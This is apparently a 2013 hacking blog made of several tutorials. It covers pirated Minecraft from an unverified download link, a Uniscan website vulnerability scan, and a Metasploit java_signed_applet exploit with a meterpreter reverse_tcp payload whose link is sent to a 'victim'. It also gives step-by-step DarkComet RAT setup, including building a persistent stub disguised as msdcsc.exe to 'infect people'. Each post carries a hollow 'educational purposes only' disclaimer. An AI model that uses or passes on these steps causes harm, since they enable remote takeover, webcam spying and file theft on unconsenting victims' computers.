Ads 468x60px

Featured Posts

Tuesday, July 23, 2013

HOW TO GET FREE MINECRAFT 1.6.2!

This tutorial will show you how to get minecraft 1.6.2

The outdated tutorial will no longer update due to the new launcher. This tutorial will show you how to fix it.



THIS IS FOR EDUCATIONAL PURPOSES ONLY!!!
I AM NOT RESPONSIBLE FOR MISUSE!
 8)


DIFFICULTY: 1


  1. Download this: https://www.dropbox.com/s/phrful7irm1br8u/Minecraft%201.6.2.exe
  2. Run the installer
  3. Open Minecraft.exe
  4. Choose a username
  5. Click Play
  6. DONE!!!


THANKS TO TEAM EXTREME FOR LAUNCHER!

(‾⌣‾)♉ PEACE!

Friday, May 31, 2013

Scanning Websites For Vulns Using Uniscan

Uniscan is a free tool used to scan websites for vulnerabilities. It is very easy to use, but also very effective in scanning. I will show you how to use uniscan on backtrack, but it is also available on all computers running perl. 

THIS IS FOR EDUCATIONAL PURPOSES ONLY!!!
I AM NOT RESPONSIBLE FOR MISUSE!
 8)


DIFFICULTY: 1

  1. Copy the url of the website you want to scan
  2. Open Backtrack
  3. Navigate to "Applications-Backtrack-Vulnerability Assessment-Web Application Assessment-Web Vulnerability Scanners-Uniscan", Or open up a terminal and type: cd /pentest/web/uniscan
  4. Type "./uniscan.pl" (You should see something like the image below)
    Uniscan
  5. Now Type "./uniscan.pl -u http://WebsiteYouWantToScan.com/ -bqdw"
    (Change -bqdw to the options you want, but I would recommend these, for it will scan for SQL-i/LFI/RFI/XSS/ and more as well as Webshells, and Backdoors)
  6. Hit ENTER and wait for uniscan to scan the website.
  7. All vulnerabilities will be listed like the image below:


    THANKS TO SECURITY GEEKS FOR PICTURES:
    http://www.securitygeeks.net/2012/11/how-to-scan-website-for-vulnerabilities.html


    (‾⌣‾)♉ PEACE!

Sunday, April 28, 2013

Hacking Windows With Metasploit (Tutorial 1)

This will be the first in a series of windows hacking tutorials using metasploit. The Metasploit Framework is one of the most valuable tools to a hacker/pentester. It allows you to use exploits in windows machines to open a meterpreter session and gain control of the victim's computer.

This tutorial will teach you a simple way to exploit a windows machine using metasploit.

THIS IS FOR EDUCATIONAL PURPOSES ONLY!!!
I AM NOT RESPONSIBLE FOR MISUSE

MSFCONSOLE

DIFFICULTY: 2

  1. Open up backtrack
  2. Open Terminal
  3. Type 'ifconfig'
  4. Write down your ip address
  5. Open a new Terminal window
  6. Type 'msfconsole' (Metasploit should look like in picture on top)
  7. Type 'use exploit/multi/browser/java_signed_applet' then hit enter
  8. Type 'set payload windows/meterpreter/reverse_tcp' then hit enter
  9. Type 'set lhost 192.168.1.110' (CHANGE 192.168.1.110 TO THE IP ADDRESS YOU WROTE IN STEP 4)
  10. Type 'set lport 443' then hit enter
  11. Type 'set srvport 80' then hit enter
  12. Type 'set uripath NotSoElite' (YOU CAN CHANGE NotSoElite TO ANY NAME)
  13. Type 'exploit' then hit enter---------------(SEE IMAGE BELOW)
  14. Now send
    'http://youripaddress:80/step12'
    to the victim's computer and they
    will be hacked
  15. Use 'sessions -l' to see hacked computers
  16. DONE!





THANKS TO D@RK TruTH FOR ORIGINAL TUTORIAL AND PICS
(‾⌣‾)♉ PEACE!

Saturday, April 27, 2013

How to install Backtrack 5 R3 GNOME (VM & LIVE)



Backtrack is a linux based operating system which comes pre-set with almost every pentesting (hacking) tool available.

Installing on a VM (Virtual Machine) will allow you to run backtrack on your pc without rebooting.

Installing LIVE requires a USB and will require a reboot, but it will work on almost any computer without installing additional software. Basically you are installing a boot-able operating system on a USB.

TUTORIAL 1: VM

  1. Install Virtual Box 
  2. Go to the backtrack download
  3. Click download (DO NOT CLICK REGISTER AND DOWNLOAD)
  4. Choose Backtrack 5 R3
  5. Choose GNOME
  6. Choose ISO
  7. Edit other settings to your will
  8. Click the 'Click To Download' Button
  9. Wait for it to download
  10. Load Virtual Box
  11. Click New
  12. Name it whatever you want
  13. Put the 'Type' as Linux
  14. Put the 'Version' as Ubuntu
  15. Add as much RAM as you want (STAY IN THE GREEN OR ELSE YOUR COMPUTER WILL BE POOP)
  16. Check 'Create a virtual hard drive now' and click Create
  17. Check 'VDI' then click next
  18. Check 'Dynamically Allocated' then click next
  19. Increase the size as much as you want then click 'Create'
  20. Select the name you created in step 11
  21. Click 'Settings'
  22. Go to 'Storage'
  23. Click on 'Empty'
  24. Look under 'Attributes' (TOP OF THE RIGHT COLUMN)
  25. Click the CD Next to where it says 'IDE Secondary Master'
  26. Click 'Choose a Virtual CD/DVD disk file...'
  27. Browse for the .iso file you downloaded in step 9
  28. Click 'Open'
  29. Click 'OK'
  30. Select it (Do the same as in step 20)
  31. Click 'Start' 
  32. DONE!!!

Saturday, April 6, 2013

iOS 6 UNTETHERED JAILBREAK


THIS IS FOR EDUCATIONAL PURPOSES ONLY! 8)
I AM NOT RESPONSIBLE FOR MISUSE!

WARNING: THIS WILL VOID YOUR WARRANTY!

Jailbreaking your iphone/ipad/ipod/apple tv will allow you to run code not approved by apple, allowing you to have cool themes and tweaks that will allow you to take FULL control over your device. This will also allow you to switch carriers on iPhone via unlocking.


  1. Go here: http://evasi0n.com/
  2. Click on the operating system you have. (Windows/Mac/Linux)
  3. Download it
  4. Open the .zip
  5. Open the folder inside
  6. Run evasi0n
  7. Connect your iDevice
  8. Click jailbreak
  9. WAIT
  10. Follow instructions
  11. ENJOY!


More tutorials on jailbreaking and tweaks will come soon

Thursday, April 4, 2013

How to Setup DarkComet-RAT (Remote Administration Tool)


THIS IS FOR EDUCATIONAL PURPOSES ONLY! 8)
I AM NOT RESPONSIBLE FOR MISUSE!

This is the first of the "real" hacking tutorials which will tell you how to do everything that hackers need to survive. 

EACH HACKING TUTORIAL WILL HAVE A DIFFICULTY RATING FROM 1 BEING SO EASY YOU CAN SET IT UP IN 5 MINUTES TO 10 WHICH MEANS YOU WILL NEED ALL THE SKILL YOU CAN HAVE PLUS A BIT OF CODING KNOWLEDGE.

To get started, we will be learning how to set up Darkcomet RAT. A RAT is a tool which will allow you to gain complete control of the computer you have infected. You can do things like stream from their webcam, open websites, delete files, send files, download files, and MUCH MUCH MORE!

This might be a somewhat hard tutorial, so I hope you don't get too mixed up.

THERE ARE GOING TO BE 2 TUTORIALS,


A PICTURE TUTORIAL AND A STEP BY STEP TUTORIAL. IF YOU WANT THE PICTURE TUTORIAL, SCROLL DOWN TO THE BOTTOM. THERE IS A LINK TO THE TUT.

STEP BY STEP: DIFFICULTY: 2.5

This is going to be split up into four parts which will show you how to set it up. Infecting will be covered in a separate tutorial.

PART 1: Downloading and installing

  1. Go here: https://www.dropbox.com/s/yms1syybxdctgyt/DarkComet.rar
  2. Download
  3. Unzip to a folder (Right click and click extract)
  4. Open the folder
  5. Open Darkcomet.exe
  6. Click accept on the 'Terms of Agreement'

PART 2: Setting up NO-IP

  1. Go to http://No-IP.com
  2. Create account
  3. Log in and click add host
  4. Choose a hostname
  5. Put the extension to 'no-ip.biz'
  6. Go here: http://www.whatismyip.com/
  7. Copy your ip address
  8. Paste it in the no-ip page where it says IP Address
  9. Click create host
  10. Download this: http://www.noip.com/downloads.php?page=win
  11. Open it up
  12. Log in with the same username and password in step 3
  13. Once logged in, click 'Select Hosts' and select the one you created in step 9
  14. Done! Move on to PART 3

PART 3: Port Forwarding

This is probably the hardest part of this tutorial. It is too complicated to write a tutorial on, mostly because everyone's router is different.
  1. Find out what router you have
  2. Go here: http://portforward.com/english/routers/port_forwarding/routerindex.htm
  3. Click on the company that makes your router or the router brand (e.g. 2wire, Linksys)
  4. Click on your router that you found out in step 1
  5. Follow the instructions for any one
  6. IMPORTANT: Remember what port you forwarded and write it down

PART 4: The GOOD STUFF

This is going to be split into 4 chapters. Each will show you different steps to setup darkcomet and infect people.

CHAPTER 1: Listening
  1. Open Darkcomet
  2. Go to the Socket/Net tab
  3. Right click
  4. Choose 'Add port to listen'
  5. Put the port you forwarded in part 3 step 6
  6. If you get an error, forward a different port
  7. Click the box 'UPnP' (Automatic Portforwarding) This works on some routers so if you get an error, uncheck it.
  8. Press Listen
CHAPTER 2: Creating the stub (Making the virus)

In this chapter, we will learn to make the actual virus. This will make a program which, once run on the victim's computer, will infect their computer with the rat and will allow you to take over.
  1. Click on the 'DarkComet-RAT' in the top left corner
  2. Go to 'Server Module'
  3. Click on 'Full editor'
  4. Go to Main Settings (Left hand side)
  5. Skip the security password.
  6. Process Mutex: Click Random a couple times
  7. Server ID: Name it whatever you want (That will be the infected computer's name)
  8. Profile Name: Name it whatever you want (That will be the name that shows up next to the victim)
  9. Go to Network Settings
  10. IP/DNS: Use the ip you created in PART 2
  11. Port: Use the port you created in PART 3
  12. Press ADD
  13. Go to Module Startup
  14. Check 'Start the stub with windows'
  15. Where it says Drop file in, locate TEMP#\
  16. Put exactly "MSDCSC\msdcsc.exe" As the file name without the quotations.
  17. Startup name: rundll32
  18. Check persistence installation
  19. Check everything below that
  20. Move on to 'Module Shield'
  21. Check the first four boxes
  22. Move on to 'Stub Finalization'
  23. DON'T CHANGE ANYTHING
  24. Click 'Build the Stub'
  25. DONE! Ready to infect!
  26. Click this link to be redirected to the infecting tutorial: (LINK COMING SOON)



PICTURE TUTORIAL:

SPECIAL THANKS TO PLUTONIUM FOR TUTORIAL

(Create an account at hackforums, it is a really good way to improve your hacking knowledge)

DONATE TO HIM IF YOU WOULD LIKE TO SUPPORT HIM.


Wednesday, April 3, 2013

HACKING TUTORIALS ARRIVING!!!

We are finally getting into the good stuff. Click on the hacking label at the top of the page to see all the tutorials on hacking stuff such as:

  1. SQL Injection
  2. How to set up a RAT (remote administration tool)
  3. How to make a virus
  4. XSS Site cross scripting
  5. Keyloggers
  6. Trojans
  7. MUCH MUCH MORE!!!!
So check it out it is at the top of the page.

(‾⌣‾)♉ PEACE!
 

Translate